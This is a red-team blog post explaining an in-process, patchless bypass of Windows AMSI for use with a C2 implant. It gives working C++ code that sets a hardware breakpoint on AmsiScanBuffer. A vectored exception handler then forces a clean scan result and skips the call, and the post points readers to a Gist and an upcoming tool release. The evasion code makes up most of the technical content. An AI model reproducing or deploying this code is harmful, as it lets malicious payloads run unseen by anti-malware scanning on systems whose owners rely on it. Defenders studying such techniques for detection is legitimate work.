Some of you may remember my patchless AMSI bypass article and how it was used inside SharpBlock to bypass AMSI on the child process that SharpBlock spawns. This is all well a good when up against client environments that are not too sensitive to the fork and run post exploitation model of operating. What about those more difficult environments where in-process execution is a must?

SharpBlock leverages the power of a debugger to be able to set breakpoints at various points of interest so that registers and arguments can be manipulated dynamically at runtime once the breakpoint is hit. Since our uber C2 process will not be running under the direction of a SharpBlock debugger, how can we use the same technique without leveraging a debugger as the parent process?

Well the answer to this is exceptions. Like a divide by zero exception or an access violation exception, breakpoints are also a form of exception. When a debugger is attached to a process, all exceptions are essentially reported to the debugger so it can have the opportunity to deal with the exception and continue execution of the program. Applications can also handle exceptions thrown internally too, via a system called structured exception handling (SEH). You might see this more commonly with code similar to this.

try{
    FunctionThatCausesDivideByZero();
}catch(DivideByZeroException e){
  
}    

In this scenario once the function raises the exception, the stack is unwound and execution continues from the catch block. For our purposes, high level exception handlers like this are no good since the call stack is unwound without completing the original intended code. Enter vectored exception handling.

Vectored exception handling is an extension to SEH which allows applications to register a chain of exception handlers for when an exception occurs within the program. The AddVectoredExceptionHandler Windows API call be used for this purpose. The good thing with a vectored exception handler is that the thread that raised the exception and it’s corresponding context can be manipulated at the precise point the exception occurred. Execution can then be instructed to continue where it left off (or not, depending on what updates where applied to the thread context). So what exactly is a thread context? A thread context is a snapshot of all the register values at the time the context was captured. This includes the current instruction pointer for the thread, the value of the stack register and values of the general purpose registers.

When dealing with an AMSI bypass, the idea will be to register a vectored exception handler then set a breakpoint on a function within amsi.dll. When the function within amsi.dll is called, an exception will be raised for our breakpoint and our exception handler function will be called. The handler will then look to manipulate the thread context in a way that indicates the buffer being scanned is clean and execution will continue. Since SharpBlock intercepts the target from the very beginning of the process we were able to target the AmsiInitalize function. A valid AMSI context is created when invoking this function ready for calling other AMSI related functions at a later time. SharpBlock took care of making sure this function would always fail through thread breakpoints and thread context manipulation. For our in-process bypass we don’t have the luxury of using this function since there are no guarantees that a valid AMSI context has not been created prior to our bypass applied. Therefore we will target the tried and tested AmsiScanBuffer function.

HANDLE setupAMSIBypass(){

    CONTEXT threadCtx;
    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_ALL;

    //Load amsi.dll if it hasn't be loaded alreay.
    if(g_amsiScanBufferPtr == nullptr){
        HMODULE amsi = GetModuleHandleA("amsi.dll");

        if(amsi == nullptr){
            amsi = LoadLibraryA("amsi.dll");
        }

        if(amsi != nullptr){
            g_amsiScanBufferPtr = (PVOID)GetProcAddress(amsi, "AmsiScanBuffer");
        }else{
            return nullptr;
        }

        if(g_amsiScanBufferPtr == nullptr)
            return nullptr;
    }

    //add our vectored exception handle
    HANDLE hExHandler = AddVectoredExceptionHandler(1, exceptionHandler);

    //Set a hardware breakpoint on AmsiScanBuffer function.
    //-2 is simply a meta handle for current thread.
    if(GetThreadContext((HANDLE)-2, &threadCtx)){
        enableBreakpoint(threadCtx, g_amsiScanBufferPtr, 0);
        SetThreadContext((HANDLE)-2, &threadCtx);
    }

    return hExHandler;
}

The code above will load amsi.dll if it has not be loaded by the process already, then add our vectored exception handler using the exceptionHandler function as the method to call when an exception occurs. The last step is to set a breakpoint on the AmsiScanBuffer function address. As mentioned earlier, we are leveraging hardware breakpoints. Software breakpoints would involve patching and int 3 instruction (0xCC) which sort of negates the whole patchless model we are trying to achieve. The drawback to hardware breakpoints is that they need to be applied to each thread within the process if you want a process wide bypass. Setting it on a single thread when loading a .NET DLL from memory works just fine though, since the AMSI scan is performed within the same thread loading the .NET PE.

OK, now that we have our exception handler in place, what does the handler function itself look like.

LONG WINAPI exceptionHandler(PEXCEPTION_POINTERS exceptions){

    if(exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP && exceptions->ExceptionRecord->ExceptionAddress == g_amsiScanBufferPtr){

	//Get the return address by reading the value currently stored at the stack pointer 
        ULONG_PTR returnAddress = getReturnAddress(exceptions->ContextRecord);
        
	//Get the address of the 6th argument, which is an int* and set it to a clean result
		int* scanResult = (int*)getArg(exceptions->ContextRecord, 5);
        *scanResult = AMSI_RESULT_CLEAN;

	//update the current instruction pointer to the caller of AmsiScanBuffer 
        setIP(exceptions->ContextRecord, returnAddress);
		
	//We need to adjust the stack pointer accordinly too so that we simulate a ret instruction
        adjustStackPointer(exceptions->ContextRecord, sizeof(PVOID));
		
	//Set the eax/rax register to 0 (S_OK) indicatring to the caller that AmsiScanBuffer finished successfully 
        setResult(exceptions->ContextRecord, S_OK);

	//Clear the hardware breakpoint, since we are now done with it
        clearHardwareBreakpoint(exceptions->ContextRecord, 0);

        return EXCEPTION_CONTINUE_EXECUTION;

    }else{
        return EXCEPTION_CONTINUE_SEARCH;
    }
}

What the exception handler does is first check that the exception that occurred is EXCEPTION_SINGLE_STEP. This is the exception code for a hardware breakpoint. We also check that the exception occurred at the AmsiScanBuffer address. If neither of those checks are true we return EXCEPTION_CONTINUE_SEARCH and allow the the program to deal with the exception as it usually would. If we are dealing with our AmsiScanBuffer exception breakpoint, then we look at manipulating the result of AmsiScanBuffer.

HRESULT AmsiScanBuffer(
  [in]           HAMSICONTEXT amsiContext,
  [in]           PVOID        buffer,
  [in]           ULONG        length,
  [in]           LPCWSTR      contentName,
  [in, optional] HAMSISESSION amsiSession,
  [out]          AMSI_RESULT  *result
);

I wont delve into too much detail on the function since there are a ton of articles out there already on AmsiScanBuffer for the bypasses that deal with patching the function. For our purposes we are interested in obtaining the address of the 6th argument so we can update the result and we are interested in the return value. Leveraging the thread context state when the exception occurred, we read and update the result argument, we set the result register to success, adjust the stack pointer to it’s position prior to the AmsiScanBuffer call, then finally adjust the instruction pointer to the expected location after AmsiScanBuffer returned. The exception handler returns EXCEPTION_CONTINUE_EXECUTION to indicate that we have handled the exception. The key thing here is that under the hood, Windows will take the thread context that we have updated and continue execution based on the updates made, essentially bypassing the call the AmsiScanBuffer call, but not before we have update the relevant values to indicate a clean result.

I have uploaded a Gist to GitHub for those interested in utilising something similar in their own projects, but soon the latest BOF.NET will be released that contains the patchless AMSI bypass.

One Reply to “In-Process Patchless AMSI Bypass”

Comments are closed.